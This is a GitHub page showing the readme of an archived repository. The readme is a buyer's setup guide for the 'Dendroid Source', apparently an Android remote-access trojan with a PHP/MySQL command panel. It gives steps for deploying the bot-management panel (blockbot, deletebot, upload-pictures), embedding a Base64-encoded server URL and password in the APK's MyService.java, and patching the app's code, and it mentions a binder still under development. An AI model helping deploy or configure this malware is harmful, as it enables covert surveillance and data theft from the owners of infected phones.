This repository has been archived by the owner on Sep 20, 2022. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 132
/
Copy pathreadme.txt
66 lines (57 loc) · 2 KB
/
readme.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
Thank You For Purchasing The Dendroid Source!
Requirements:
Web server with PHP and MySql
phpmyadmin (Easy DB setup)
OpenJDK JRE x64
Java JDK (If on x64 Windows you need to set the environment variable JAVA_HOME C:\Program Files\Java\JDK***
Web Panel Setup:
Extract Dendroid Panel
Move all files to your web server or httdocs if following setup video
Set correct permissions (Linux)
Change URL to your web server in reg.php
Change URL to your web server in Following Files, E.G http://127.0.0.1/:
applysettings.php
blockbot.php
clearawaiting.php (Also add <?php to first line)
clearmessages.php (Also add <?php to first line)
deletebot.php
deletefile.php
deletepics.php
functions.php
table.php
Change Password in following files to your password of your DB:
get.php
get-functions.php
new-upload.php
upload-pictures.php
Finally:
Go to your webserver Example: http://127.0.0.1
Follow Setup and Create Database
Database Setup:
Start phpmyadmin
Add new database (all settings must match your panel)
Set correct user and password on both panel and DB
APK Setup:
Open MyService.java
Look for encodedURL (Base64 Encrypted URL) add your url (Base64 Encoded)
backupURL same as above
encodedPassword must match one on DB & in Files for correct configuration (Base64 Encoded)
Make sure your URL does not have a final / E.G http://127.0.0.1
APK Fix: (Blank Space in URL Error)
Go To Line 275 : 17 In Eclipse and change following:
provider = telephonyManager.getNetworkOperatorName(); to
provider = removeBlankSpace(new StringBuilder(telephonyManager.getNetworkOperatorName()));
Go To Line 2326 : 5 In Eclipse and add following code:
static String removeBlankSpace(StringBuilder sb) {
int j = 0;
for(int i = 0; i < sb.length(); i++) {
if (!Character.isWhitespace(sb.charAt(i))) {
sb.setCharAt(j++, sb.charAt(i));
}
}
sb.delete(j, sb.length());
return sb.toString();
}
The above fix has been added to the apk source.
APK Binder(VBnet) Still working on this:
Download Visual Studio Express and Compile :)